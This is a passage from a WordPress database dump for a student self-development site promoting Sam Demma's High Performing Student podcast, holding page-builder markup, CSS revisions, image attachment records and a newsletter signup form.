00:01:24','2020-10-29 00:01:24','',2073,'http://highperformingstudent.com/wp-content/uploads/2020/10/testimonial-3.jpeg',0,'attachment','image/jpeg',0),(2089,1,'2020-10-29 00:01:25','2020-10-29 00:01:25','','testimonial 2','','inherit','open','closed','','testimonial-2','','','2020-10-29 00:01:25','2020-10-29 00:01:25','',2073,'http://highperformingstudent.com/wp-content/uploads/2020/10/testimonial-2.jpeg',0,'attachment','image/jpeg',0),(2090,1,'2020-10-29 00:01:26','2020-10-29 00:01:26','','testimonial 1','','inherit','open','closed','','testimonial-1','','','2020-10-29 00:01:26','2020-10-29 00:01:26','',2073,'http://highperformingstudent.com/wp-content/uploads/2020/10/testimonial-1.jpeg',0,'attachment','image/jpeg',0),(2091,1,'2020-10-29 00:01:57','2020-10-29 00:01:57','','testimonial 1','','inherit','open','closed','','testimonial-1-2','','','2020-10-29 00:01:57','2020-10-29 00:01:57','',2073,'http://highperformingstudent.com/wp-content/uploads/2020/10/testimonial-1-1.jpeg',0,'attachment','image/jpeg',0),(2092,1,'2020-10-29 00:02:05','2020-10-29 00:02:05','','testimonial 2','','inherit','open','closed','','testimonial-2-2','','','2020-10-29 00:02:05','2020-10-29 00:02:05','',2073,'http://highperformingstudent.com/wp-content/uploads/2020/10/testimonial-2-1.jpeg',0,'attachment','image/jpeg',0),(2093,1,'2020-10-29 00:02:13','2020-10-29 00:02:13','','testimonial 3','','inherit','open','closed','','testimonial-3-2','','','2020-10-29 00:02:13','2020-10-29 00:02:13','',2073,'http://highperformingstudent.com/wp-content/uploads/2020/10/testimonial-3-1.jpeg',0,'attachment','image/jpeg',0),(2094,1,'2020-10-29 00:02:21','2020-10-29 00:02:21','','testimonial 4','','inherit','open','closed','','testimonial-4-2','','','2020-10-29 00:02:21','2020-10-29 00:02:21','',2073,'http://highperformingstudent.com/wp-content/uploads/2020/10/testimonial-4-1.jpg',0,'attachment','image/jpeg',0),(2095,1,'2020-10-29 00:02:55','2020-10-29 00:02:55','','test','','inherit','open','closed','','test','','','2020-10-29 00:02:55','2020-10-29 00:02:55','',2073,'http://highperformingstudent.com/wp-content/uploads/2020/10/test.jpeg',0,'attachment','image/jpeg',0),(2096,1,'2020-10-29 00:08:50','2020-10-29 00:08:50','[vc_row parallax=\"yes\" el_id=\"features\" color_scheme=\"custom\" darken=\"dark\" css=\".vc_custom_1603924265428{padding-bottom: 100px !important;background-color: #ffffff !important;}\"][vc_column][vc_custom_heading text=\"High Performing Student Podcast\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][/vc_column][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_column_text]\r\n<p style=\"text-align: center;\">The High Performing Student podcast is hosted by a 21-year-old keynote speaker and entrepreneur Sam Demma and was created to help you gain clarity and begin crafting a life that excites you. <a href=\"https://podcasts.apple.com/ca/podcast/high-performing-student/id1450741018\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Over 20,000 students have tuned in to date!</strong></a></p>\r\n<p style=\"text-align: center;\">In each episode, you’ll learn the small consistent actions, strategies and systems that will help you uncover your potential and ultimately become the strongest version of yourself.</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][vc_column][vc_row_inner css=\".vc_custom_1603924201644{background-color: #ffffff !important;}\"][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Content\" text=\"There are over 100 episodes on the podcast answering questions that students sent to Sam. Each episode is from 10-60 minutes and can be found wherever you listen to your podcasts.\" style=\"right\" animation_delay=\"200\" icon=\"fa-camera-retro\"][icon_box title=\"Action-Orientated\" text=\"Each episode has a clear call to action. Whether it\'s a three step process to overcoming your fear of public speaking, or how to negotiate with your teacher for an extension.\" style=\"right\" animation_delay=\"400\" icon=\"fa-cog\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"2082\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1603924765880{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Community\" text=\"Since the start of the show, over 20,000 students have tuned in. Most of these students get Sam\'s exclusive emails as well: www.samdemma.com/hps\" style=\"left\" animation_delay=\"200\" icon=\"fa-desktop\"][icon_box title=\"Relatable\" text=\"Sam was a student only a few years ago. Everything he shares with you on the podcast is from lived experience, and if you\'re a student, you\'ll be able to relate to every episode.\" style=\"left\" animation_delay=\"400\" icon=\"fa-paper-plane-o\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1603929402169{padding-top: 40px !important;}\"][vc_column_inner width=\"1/6\"][/vc_column_inner][vc_column_inner width=\"1/6\"][/vc_column_inner][vc_column_inner width=\"1/6\"][vc_single_image image=\"2083\" img_size=\"medium\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://podcasts.apple.com/ca/podcast/small-consistent-actions/id1450741018?mt=2\"][/vc_column_inner][vc_column_inner width=\"1/6\"][vc_single_image image=\"2084\" img_size=\"medium\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://open.spotify.com/show/7MNKgL3Dq4RoSHKCUD3ns1\"][/vc_column_inner][vc_column_inner width=\"1/6\"][/vc_column_inner][vc_column_inner width=\"1/6\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_width=\"fullwidth\" css=\".vc_custom_1603929990399{padding-top: 30px !important;background-color: #000000 !important;}\"][vc_column width=\"1/4\"][vc_single_image image=\"2088\" img_size=\"full\"][/vc_column][vc_column width=\"1/4\"][vc_single_image image=\"2089\" img_size=\"full\"][/vc_column][vc_column width=\"1/4\"][vc_single_image image=\"2087\" img_size=\"full\"][/vc_column][vc_column width=\"1/4\"][vc_single_image image=\"2095\" img_size=\"full\"][/vc_column][/vc_row]','Podcast','','inherit','closed','closed','','2073-revision-v1','','','2020-10-29 00:08:50','2020-10-29 00:08:50','',2073,'http://highperformingstudent.com/2020/10/29/2073-revision-v1/',0,'revision','',0),(2098,1,'2020-10-29 00:12:39','2020-10-29 00:12:39','.nav-inner .logo a img {\n    max-height: 70px;\n}\n\n#navigation-sticky.dark-nav {\n    background-color: #131313;\n}\n\n.btn-lg, .btn-group-lg>.btn {\n    padding: 18px 25px;\n    font-size: 1.8rem;\n    line-height: 1.33;\n    border-radius: 4px;\n	  border-color: #a00006;\n	  font-weight: 700;\n	  font-family: Roboto;\n	  text-transform: uppercase;\n	  background-color: #a00006\n}\n\n.vc_custom_1603924265428 {\n    padding-bottom: 10px !important;\n    background-color: #ffffff !important;\n}','north','','inherit','closed','closed','','39-revision-v1','','','2020-10-29 00:12:39','2020-10-29 00:12:39','',39,'http://highperformingstudent.com/2020/10/29/39-revision-v1/',0,'revision','',0),(2099,1,'2020-10-29 00:21:09','2020-10-29 00:21:09',' ','','','publish','closed','closed','','2099','','','2020-10-29 00:21:09','2020-10-29 00:21:09','',0,'http://highperformingstudent.com/?p=2099',6,'nav_menu_item','',0),(2101,1,'2020-10-29 00:42:26','2020-10-29 00:42:26','[vc_row bg_overlay=\"light\" css=\".vc_custom_1603932094448{padding-bottom: 15px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"We\'re here to help!\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">Your message matters.  Please take a moment below to let us know how we can help you.\r\nYou will hear from us in under 24 hours :-)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][wpforms id=\"2100\" title=\"false\" description=\"false\"][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row]','Contact','','inherit','closed','closed','','8-autosave-v1','','','2020-10-29 00:42:26','2020-10-29 00:42:26','',8,'http://highperformingstudent.com/2020/10/29/8-autosave-v1/',0,'revision','',0),(2105,1,'2020-10-29 00:43:26','2020-10-29 00:43:26','[vc_row bg_overlay=\"light\" css=\".vc_custom_1603932094448{padding-bottom: 15px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"We\'re here to help!\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">Your message matters.  Please take a moment below to let us know how we can help you.\r\nYou will hear from us in under 24 hours :-)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][wpforms id=\"2100\" title=\"false\" description=\"false\"][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row]','Contact','','inherit','closed','closed','','8-revision-v1','','','2020-10-29 00:43:26','2020-10-29 00:43:26','',8,'http://highperformingstudent.com/2020/10/29/8-revision-v1/',0,'revision','',0),(2102,1,'2020-10-29 00:32:54','2020-10-29 00:32:54','<p>[vc_row bg_overlay=\"light\" css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"We\'re here to help!\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\">Your message matters.  Please take a moment below to let us know how we can help you.  <br />You will hear from us in under 24 hours :-)</p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][wpforms id=\"2100\" title=\"false\" description=\"false\"][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row content_width=\"fullwidth\" css=\".vc_custom_1603931138735{padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column][gmap marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\"][/vc_column][/vc_row]</p>','Contact','','inherit','closed','closed','','8-revision-v1','','','2020-10-29 00:32:54','2020-10-29 00:32:54','',8,'http://highperformingstudent.com/2020/10/29/8-revision-v1/',0,'revision','',0),(2120,1,'2020-12-03 21:27:06','2020-12-03 21:27:06','','HPS_Color_Black Text.png','','inherit','open','closed','','hps_color_black-text-png-2','','','2020-12-03 21:27:06','2020-12-03 21:27:06','',0,'http://highperformingstudent.com/wp-content/uploads/2020/12/HPS_Color_Black-Text.png.png',0,'attachment','image/png',0),(2145,1,'2021-02-01 15:07:11','2021-02-01 15:07:11','[vc_row full_height=\"yes\" el_id=\"first\" content_width=\"fullwidth\" css=\".vc_custom_1612191669997{padding-top: 237px !important;padding-bottom: 237px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-80-1.png?id=2142) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" fullwidth=\"yes\" row_width=\"fullwidth\"][vc_column width=\"1/6\"][/vc_column][vc_column width=\"5/6\"][vc_custom_heading text=\"Become ``Real World`` Ready\" font_container=\"tag:h1|font_size:4.5rem|text_align:left|color:%23ffffff|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_custom_heading text=\"Your High-Performance Journey Starts Now.\" font_container=\"tag:p|font_size:1.1em|text_align:left|color:%23ffffff|line_height:1.1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:500%20bold%20regular%3A500%3Anormal\"][vc_empty_space height=\"15px\"][button label=\"Get Started Here\" target=\"_blank\" color=\"custom\" size=\"large\" customcolor=\"#e612a9\" undefined=\"\" url=\"www.samdemma.com\"][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column][vc_custom_heading text=\"You are going to die...\" font_container=\"tag:h2|font_size:4.5rem|text_align:left|color:%23333333|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: left;\"><span style=\"font-weight: 400;\">Like a food product, you have a personal “best before” date.  And before that date, there are memories you want to make, places you want to explore, people you want to meet, and an impact you want to create.  The only way to accomplish this before you expire is to reach your full potential.  <strong>Through the development of six key-skills, we help you max out your potential to live a healthy, happier and more productive life.</strong></span></p>\r\n[/vc_column_text][/vc_column][/vc_row]','Home1','','inherit','closed','closed','','623-revision-v1','','','2021-02-01 15:07:11','2021-02-01 15:07:11','',623,'http://highperformingstudent.com/2021/02/01/623-revision-v1/',0,'revision','',0);
INSERT INTO `wpii_posts` VALUES (2104,1,'2020-10-29 00:37:02','2020-10-29 00:37:02','.nav-inner .logo a img {\n    max-height: 70px;\n}\n\n#navigation-sticky.dark-nav {\n    background-color: #131313;\n}\n\n.btn-lg, .btn-group-lg>.btn {\n    padding: 18px 25px;\n    font-size: 1.8rem;\n    line-height: 1.33;\n    border-radius: 4px;\n	  border-color: #a00006;\n	  font-weight: 700;\n	  font-family: Roboto;\n	  text-transform: uppercase;\n	  background-color: #a00006\n}\n\n.vc_custom_1603924265428 {\n    padding-bottom: 10px !important;\n    background-color: #ffffff !important;\n}\n\ndiv.wpforms-container-full .wpforms-form input[type=submit], div.wpforms-container-full .wpforms-form button[type=submit], div.wpforms-container-full .wpforms-form .wpforms-page-button {\n    background-color: #a00006;\n    border: 4px solid #a00006;\n    color: #ffffff;\n    font-size: 1.8rem;\n    font-weight: 900;\n    text-transform: uppercase;\n    padding: 10px 20px;\n}\n\ndiv.wpforms-container-full .wpforms-form input[type=submit]:hover, div.wpforms-container-full .wpforms-form input[type=submit]:focus, div.wpforms-container-full .wpforms-form input[type=submit]:active, div.wpforms-container-full .wpforms-form button[type=submit]:hover, div.wpforms-container-full .wpforms-form button[type=submit]:focus, div.wpforms-container-full .wpforms-form button[type=submit]:active, div.wpforms-container-full .wpforms-form .wpforms-page-button:hover, div.wpforms-container-full .wpforms-form .wpforms-page-button:active, div.wpforms-container-full .wpforms-form .wpforms-page-button:focus {\n    background-color: #ff670f;\n    border: 4px solid #ff670f;\n    cursor: pointer;\n	  font-size: 1.8rem;\n    font-weight: 900;\n	\n	\n}','north','','inherit','closed','closed','','39-revision-v1','','','2020-10-29 00:37:02','2020-10-29 00:37:02','',39,'http://highperformingstudent.com/2020/10/29/39-revision-v1/',0,'revision','',0),(2123,1,'2021-02-01 13:50:57','2021-02-01 13:50:57','','SamDemma-Logo-FINAL','','inherit','open','closed','','samdemma-logo-final','','','2021-02-01 13:50:57','2021-02-01 13:50:57','',0,'http://highperformingstudent.com/wp-content/uploads/2021/02/SamDemma-Logo-FINAL.png',0,'attachment','image/png',0),(2115,1,'2020-12-03 21:23:23','2020-12-03 21:23:23','<p>\r\n    <label>First Name</label>\r\n    <input type=\"text\" name=\"FNAME\">\r\n</p>\r\n<p>\r\n    <label>Last Name</label>\r\n    <input type=\"text\" name=\"LNAME\">\r\n</p>\r\n<p>\r\n	<label>Email address: \r\n		<input type=\"email\" name=\"EMAIL\" placeholder=\"Your email address\" required />\r\n</label>\r\n</p>\r\n<p>\r\n    <label>How did you hear about us?</label>\r\n    <input type=\"text\" name=\"MMERGE3\">\r\n</p>\r\n\r\n\r\n<p>\r\n	<input type=\"submit\" value=\"Sign up\" />\r\n</p>','HPSwaitlist','','publish','closed','closed','','2115','','','2020-12-03 21:23:23','2020-12-03 21:23:23','',0,'http://highperformingstudent.com/mc4wp-form/2115/',0,'mc4wp-form','',0),(2125,1,'2021-02-01 13:53:19','2021-02-01 13:53:19','.nav-inner .logo a img {\n    max-height: 70px;\n}\n\n#navigation-sticky.dark-nav {\n    background-color: #ffffff;\n}\n\n.btn-lg, .btn-group-lg>.btn {\n    padding: 18px 25px;\n    font-size: 1.8rem;\n    line-height: 1.33;\n    border-radius: 4px;\n	  border-color: #a00006;\n	  font-weight: 700;\n	  font-family: Roboto;\n	  text-transform: uppercase;\n	  background-color: #a00006\n}\n\n.vc_custom_1603924265428 {\n    padding-bottom: 10px !important;\n    background-color: #ffffff !important;\n}\n\ndiv.wpforms-container-full .wpforms-form input[type=submit], div.wpforms-container-full .wpforms-form button[type=submit], div.wpforms-container-full .wpforms-form .wpforms-page-button {\n    background-color: #a00006;\n    border: 4px solid #a00006;\n    color: #ffffff;\n    font-size: 1.8rem;\n    font-weight: 900;\n    text-transform: uppercase;\n    padding: 10px 20px;\n}\n\ndiv.wpforms-container-full .wpforms-form input[type=submit]:hover, div.wpforms-container-full .wpforms-form input[type=submit]:focus, div.wpforms-container-full .wpforms-form input[type=submit]:active, div.wpforms-container-full .wpforms-form button[type=submit]:hover, div.wpforms-container-full .wpforms-form button[type=submit]:focus, div.wpforms-container-full .wpforms-form button[type=submit]:active, div.wpforms-container-full .wpforms-form .wpforms-page-button:hover, div.wpforms-container-full .wpforms-form .wpforms-page-button:active, div.wpforms-container-full .wpforms-form .wpforms-page-button:focus {\n    background-color: #ff670f;\n    border: 4px solid #ff670f;\n    cursor: pointer;\n	  font-size: 1.8rem;\n    font-weight: 900;	\n}\n\n.wpforms-confirmation-container-full, div[submit-success]>.wpforms-confirmation-container-full:not(.wpforms-redirection-message) {\n    background: #ff670f;\n    border: 1px solid #ff670f;\n}\n\n.wpforms-confirmation-container-full, div[submit-success]>.wpforms-confirmation-container-full {\n    color: #ffffff;\n    margin: 0 auto 24px;\n    padding: 15px 15px;\n}','north','','inherit','closed','closed','','39-revision-v1','','','2021-02-01 13:53:19','2021-02-01 13:53:19','',39,'http://highperformingstudent.com/2021/02/01/39-revision-v1/',0,'revision','',0),(2144,1,'2021-02-01 15:05:57','2021-02-01 15:05:57','','north','','inherit','closed','closed','','39-revision-v1','','','2021-02-01 15:05:57','2021-02-01 15:05:57','',39,'http://highperformingstudent.com/2021/02/01/39-revision-v1/',0,'revision','',0),(2127,1,'2021-02-01 14:00:55','2021-02-01 14:00:55','.btn-lg, .btn-group-lg>.btn {\n    padding: 18px 25px;\n    font-size: 1.8rem;\n    line-height: 1.33;\n    border-radius: 4px;\n	  border-color: #a00006;\n	  font-weight: 700;\n	  font-family: Roboto;\n	  text-transform: uppercase;\n	  background-color: #a00006\n}\n\n.vc_custom_1603924265428 {\n    padding-bottom: 10px !important;\n    background-color: #ffffff !important;\n}\n\ndiv.wpforms-container-full .wpforms-form input[type=submit], div.wpforms-container-full .wpforms-form button[type=submit], div.wpforms-container-full .wpforms-form .wpforms-page-button {\n    background-color: #a00006;\n    border: 4px solid #a00006;\n    color: #ffffff;\n    font-size: 1.8rem;\n    font-weight: 900;\n    text-transform: uppercase;\n    padding: 10px 20px;\n}\n\ndiv.wpforms-container-full .wpforms-form input[type=submit]:hover, div.wpforms-container-full .wpforms-form input[type=submit]:focus, div.wpforms-container-full .wpforms-form input[type=submit]:active, div.wpforms-container-full .wpforms-form button[type=submit]:hover, div.wpforms-container-full .wpforms-form button[type=submit]:focus, div.wpforms-container-full .wpforms-form button[type=submit]:active, div.wpforms-container-full .wpforms-form .wpforms-page-button:hover, div.wpforms-container-full .wpforms-form .wpforms-page-button:active, div.wpforms-container-full .wpforms-form .wpforms-page-button:focus {\n    background-color: #ff670f;\n    border: 4px solid #ff670f;\n    cursor: pointer;\n	  font-size: 1.8rem;\n    font-weight: 900;	\n}\n\n.wpforms-confirmation-container-full, div[submit-success]>.wpforms-confirmation-container-full:not(.wpforms-redirection-message) {\n    background: #ff670f;\n    border: 1px solid #ff670f;\n}\n\n.wpforms-confirmation-container-full, div[submit-success]>.wpforms-confirmation-container-full {\n    color: #ffffff;\n    margin: 0 auto 24px;\n    padding: 15px 15px;\n}','north','','inherit','closed','closed','','39-revision-v1','','','2021-02-01 14:00:55','2021-02-01 14:00:55','',39,'http://highperformingstudent.com/2021/02/01/39-revision-v1/',0,'revision','',0),(2107,1,'2020-10-29 00:46:30','2020-10-29 00:46:30','.nav-inner .logo a img {\n    max-height: 70px;\n}\n\n#navigation-sticky.dark-nav {\n    background-color: #131313;\n}\n\n.btn-lg, .btn-group-lg>.btn {\n    padding: 18px 25px;\n    font-size: 1.8rem;\n    line-height: 1.33;\n    border-radius: 4px;\n	  border-color: #a00006;\n	  font-weight: 700;\n	  font-family: Roboto;\n	  text-transform: uppercase;\n	  background-color: #a00006\n}\n\n.vc_custom_1603924265428 {\n    padding-bottom: 10px !important;\n    background-color: #ffffff !important;\n}\n\ndiv.wpforms-container-full .wpforms-form input[type=submit], div.wpforms-container-full .wpforms-form button[type=submit], div.wpforms-container-full .wpforms-form .wpforms-page-button {\n    background-color: #a00006;\n    border: 4px solid #a00006;\n    color: #ffffff;\n    font-size: 1.8rem;\n    font-weight: 900;\n    text-transform: uppercase;\n    padding: 10px 20px;\n}\n\ndiv.wpforms-container-full .wpforms-form input[type=submit]:hover, div.wpforms-container-full .wpforms-form input[type=submit]:focus, div.wpforms-container-full .wpforms-form input[type=submit]:active, div.wpforms-container-full .wpforms-form button[type=submit]:hover, div.wpforms-container-full .wpforms-form button[type=submit]:focus, div.wpforms-container-full .wpforms-form button[type=submit]:active, div.wpforms-container-full .wpforms-form .wpforms-page-button:hover, div.wpforms-container-full .wpforms-form .wpforms-page-button:active, div.wpforms-container-full .wpforms-form .wpforms-page-button:focus {\n    background-color: #ff670f;\n    border: 4px solid #ff670f;\n    cursor: pointer;\n	  font-size: 1.8rem;\n    font-weight: 900;	\n}\n\n.wpforms-confirmation-container-full, div[submit-success]>.wpforms-confirmation-container-full:not(.wpforms-redirection-message) {\n    background: #ff670f;\n    border: 1px solid #ff670f;\n}\n\n.wpforms-confirmation-container-full, div[submit-success]>.wpforms-confirmation-container-full {\n    color: #ffffff;\n    margin: 0 auto 24px;\n    padding: 15px 15px;\n}','north','','inherit','closed','closed','','39-revision-v1','','','2020-10-29 00:46:30','2020-10-29 00:46:30','',39,'http://highperformingstudent.com/2020/10/29/39-revision-v1/',0,'revision','',0),(2110,1,'2020-11-06 01:30:42','2020-11-06 01:30:42','[vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"OUR MISSION\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">Through the development of six key skills, we help students max out their potential <span style=\"font-weight: 400;\">to live a healthy, happier and more productive life. </span>We accomplish this through our <a href=\"http://highperformingstudent.com/podcast/\">podcast</a>, <a href=\"http://highperformingstudent.com/book/\">book</a>, <a href=\"http://highperformingstudent.com/speaking/\">self-leadership seminars</a>, and <a href=\"http://highperformingstudent.com/courses/\">modular online courses</a>.</p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row content_placement=\"middle\"][vc_column width=\"1/2\"][vc_custom_heading text=\"OUR FOUNDER\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]At 21 years old, entrepreneur, youth coach, and keynote speaker Sam Demma doesn’t let his age define his drive or credibility.  His goal is to provide students with the tools and strategies they need to become the change-makers in their schools, businesses, communities, and in the lives of those around them.  And it all started with…garbage.  At the age of 17, he co-founded <a href=\"http://www.pickwaste.com\">PickWaste</a>, a grassroots initiative that brings people together to pick up trash in their communities.  After filling nearly 2000 bags of litter, Sam was convinced that small actions can have a big impact, and he lives that message in all he does.\r\n\r\nIn a few short years, his presentations have reached thousands of students across Canada and his programs have made a difference for young people in 6 countries around the world.  He’s delivered two <a href=\"https://www.ted.com/talks/sam_demma_small_consistent_actions\">TEDx talks</a>, he is the youngest Professional member of the Canadian Association of Professional Speakers, and there’s no limit to where small actions will take this big thinker.[/vc_column_text][button label=\"More About Sam\" size=\"large\" align=\"center\" url=\"www.samdemma.com\" undefined=\"\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"2052\" img_size=\"full\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"THE RESEARCH\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">All of our programs and initiatives are built on evidence-based research.  Of course, we walk students through the \"how\", but more importantly, we explain the \"why\".  Giving your students a strong reason to act on the information is our obsession.</p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>VISON</strong></p>\r\n<p style=\"text-align: center;\"><em><strong><span style=\"text-decoration: underline;\">What you focus on is sought out by your Reticular Activating System.</span> </strong></em>(Learn more from the University of Minnesota <a href=\"https://extension.umn.edu/two-you-video-series/ras\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>ROUTINES</strong></p>\r\n<p style=\"text-align: center;\"><span style=\"text-decoration: underline;\"><em><strong>Scientists say your morning mood affects your productivity and relationships for the rest of the day</strong></em></span>. (read the full study <a href=\"https://faculty.wharton.upenn.edu/wp-content/uploads/2013/01/Rothbard-Wilk_AMJ_Final.pdf\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>ACCOUNTABILITY</strong></p>\r\n<p style=\"text-align: center;\"><span style=\"text-decoration: underline;\"><strong>I</strong></span><em style=\"font-weight: bold;\"><span style=\"text-decoration: underline;\"><strong>f</strong> you have a specific accountability appointment, you will increase your chance of success by up to 95%”</span>  </em>(read the full study <a href=\"https://medium.com/the-mission/the-accountability-effect-a-simple-way-to-achieve-your-goals-and-boost-your-performance-8a07c76ef53a#:~:text=The%20American%20Society%20of%20Training,success%20by%20up%20to%2095%25.\">here</a>)</p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>MINDFULNESS</strong></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"text-decoration: underline;\">Students who meditated had <em>15% better math scores, showed 24% more social behaviours, were 24% less aggressive.</em>..</span></strong> (read the full article <a href=\"https://time.com/3682311/mindfulness-math/\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>GOAL SETTING</strong></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"text-decoration: underline;\">You\'re 42 percent more likely to achieve your goals if you write them down.</span>  </em></strong>(read the full study <a href=\"https://braveheartsales.com/wp-content/uploads/Goals-Research-Summary.pdf?x60870\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>SELF-CONFIDENCE</strong></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"text-decoration: underline;\">“Setting goals is linked to self-confidence, motivation, and autonomy (Locke &amp; Latham, 